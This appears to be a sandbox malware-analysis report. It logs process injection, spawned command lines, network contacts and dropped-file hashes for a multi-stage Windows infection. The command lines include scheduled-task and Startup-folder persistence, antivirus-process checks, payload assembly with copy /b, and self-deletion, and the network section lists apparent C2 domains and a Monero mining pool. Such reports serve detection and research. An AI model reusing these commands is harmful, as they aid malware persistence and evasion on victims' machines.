Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8D5B.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3820 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3820 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 5088 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5088 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3820 wrote to memory of 4624 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 3820 wrote to memory of 4624 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 3820 wrote to memory of 4624 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 1500 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Windows\SysWOW64\icacls.exe
PID 1500 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Windows\SysWOW64\icacls.exe
PID 1500 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Windows\SysWOW64\icacls.exe
PID 1500 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 1500 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 1500 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 3820 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EE8.exe
PID 3820 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EE8.exe
PID 3820 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EE8.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3240 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 3240 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 3240 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 3240 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe
PID 3240 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe
PID 3240 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C25C.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\FD24.exe

"C:\Users\Admin\AppData\Local\Temp\FD24.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\FD24.exe

"C:\Users\Admin\AppData\Local\Temp\FD24.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\EE8.exe

C:\Users\Admin\AppData\Local\Temp\EE8.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 1172

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe"

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe"

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1472

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\761A.exe

C:\Users\Admin\AppData\Local\Temp\761A.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\78DA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 944

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\C69E.exe

C:\Users\Admin\AppData\Local\Temp\C69E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Local\Temp\82FA.exe

C:\Users\Admin\AppData\Local\Temp\82FA.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Users\Admin\AppData\Local\Temp\8D5B.exe

C:\Users\Admin\AppData\Local\Temp\8D5B.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 25500

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 25500\Http.pif

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 25500\F

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

25500\Http.pif 25500\F

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SYSTEM32\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit

C:\Windows\SYSTEM32\cmd.exe

cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

C:\Windows\system32\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Roaming\bbtsjjr

C:\Users\Admin\AppData\Roaming\bbtsjjr

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 sdfjhuz.com udp
PE 190.187.52.42:80 sdfjhuz.com tcp
US 8.8.8.8:53 42.52.187.190.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 166.138.96.79.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 theonlyreasonwhywe.pro udp
PE 190.187.52.42:80 sdfjhuz.com tcp
US 172.67.218.191:443 theonlyreasonwhywe.pro tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
US 8.8.8.8:53 sajdfue.com udp
CO 186.112.12.181:80 sajdfue.com tcp
US 8.8.8.8:53 wisemassiveharmonious.shop udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 colorfulequalugliess.shop udp
US 104.21.19.68:443 colorfulequalugliess.shop tcp
US 8.8.8.8:53 191.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.19.21.104.in-addr.arpa udp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
CO 186.112.12.181:80 sajdfue.com tcp
US 8.8.8.8:53 181.12.112.186.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
DE 5.75.208.156:80 5.75.208.156 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 172.67.217.100:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 technologyenterdo.shop udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 valowaves.com udp
US 104.21.51.243:443 valowaves.com tcp
US 8.8.8.8:53 detectordiscusser.shop udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 100.217.67.172.in-addr.arpa udp
US 8.8.8.8:53 243.51.21.104.in-addr.arpa udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 8.8.8.8:53 114.16.185.192.in-addr.arpa udp
US 8.8.8.8:53 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly udp
US 209.141.39.59:443 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly tcp
US 8.8.8.8:53 59.39.141.209.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
TR 94.156.8.100:80 94.156.8.100 tcp
US 8.8.8.8:53 100.8.156.94.in-addr.arpa udp
US 8.8.8.8:53 udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
NL 195.20.16.82:443 195.20.16.82 tcp
US 8.8.8.8:53 82.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 lknusantararaya.com udp
ID 103.147.154.49:443 lknusantararaya.com tcp
FI 37.27.52.220:80 37.27.52.220 tcp
US 8.8.8.8:53 49.154.147.103.in-addr.arpa udp
US 8.8.8.8:53 220.52.27.37.in-addr.arpa udp
US 8.8.8.8:53 gZrMmkMPXNMnXLftODCxOMCJtQlce.gZrMmkMPXNMnXLftODCxOMCJtQlce udp
US 8.8.8.8:53 xmr-us-west1.nanopool.org udp
US 66.42.105.146:10300 xmr-us-west1.nanopool.org tcp
US 209.141.39.59:443 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly tcp
US 8.8.8.8:53 146.105.42.66.in-addr.arpa udp

Files

memory/2912-2-0x0000000000960000-0x000000000096B000-memory.dmp

memory/2912-3-0x0000000000400000-0x000000000071E000-memory.dmp

memory/2912-1-0x00000000009C0000-0x0000000000AC0000-memory.dmp

memory/3820-4-0x0000000001420000-0x0000000001436000-memory.dmp

memory/2912-5-0x0000000000400000-0x000000000071E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C25C.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\FD24.exe

MD5 86d2d73c4c81d01b4079c8fe0e4a3236
SHA1 7067481810482f0a56fdd2d6601bfdfe335e561a
SHA256 0cb1b023bb7d23b2386d0e27d0520666b30ff328cd75347cd699cf327a19099d
SHA512 bce026224923432f943cc0758f9d8f7452e271c96c94ce402dd64c1fe3a872edf33634f7148dd1c9dd2b0e93012424b3275cbba0f3d27350952215deec43e643

C:\Users\Admin\AppData\Local\Temp\FD24.exe

MD5 0b7933ec901872b006c120bbd72de35b
SHA1 795b0d15fdfb418959c7fa196f03d4f10132ee87
SHA256 7c8504826aa041fb6e21fdd17d41e74bf95de7a569d6cd0cc83ea070565c9487
SHA512 5a1a7889ce45143ad1a7c6dc747c70c96fa1e0449f4ba04dad6ae096ab49366c753c4bdadba1820bd91298b238f69200cc85327728138604b969c9ac1d55f0f9

C:\Users\Admin\AppData\Local\Temp\FD24.exe

MD5 4aa594c52501afbe4683dfac6fbc3d23
SHA1 13d7d750edb6c71ab67e859e16b19119003492ac
SHA256 54df3b096cc840631965dd739bad42832db0b9d5f312477a0bf81594c0cb749a
SHA512 535ed23e4cd7ab506ebe1ef2b99d1de1e7c861071200e7da5d8f34fe4d1e499806de5d1bbe4eed7b9ca0d30f026951965d1082a657ebda5ab148b65b8d6cbbe9

memory/1500-26-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1500-25-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4624-24-0x0000000002210000-0x000000000232B000-memory.dmp

memory/4624-22-0x0000000002170000-0x0000000002205000-memory.dmp

memory/1500-23-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1500-20-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\FD24.exe

MD5 a660ab5aa8a5d422ea853ad760b0d13b
SHA1 db805faa2a71b42a9937e0f622858d5df0b572af
SHA256 3562399c683c99ac2d81a2a9e0490e33ba006a0258be1bf39bbe8f358a2d0379
SHA512 76886529f368274c41e7f6174454e3d50464eeda1fb4631b14fba319dbfcd36fd776761df61912b223db480a47c0cc223d4880f751f9a279f9d527def7c48e37

memory/1500-38-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FD24.exe

MD5 f3bb5cc7cecd785c62d03af0313de2e9
SHA1 9a5170f407f947ff7a1d5a078de11b14e4482215
SHA256 072055b1a73ee70617ab1d2fc142a08f1883c463309f107e058433963886a08b
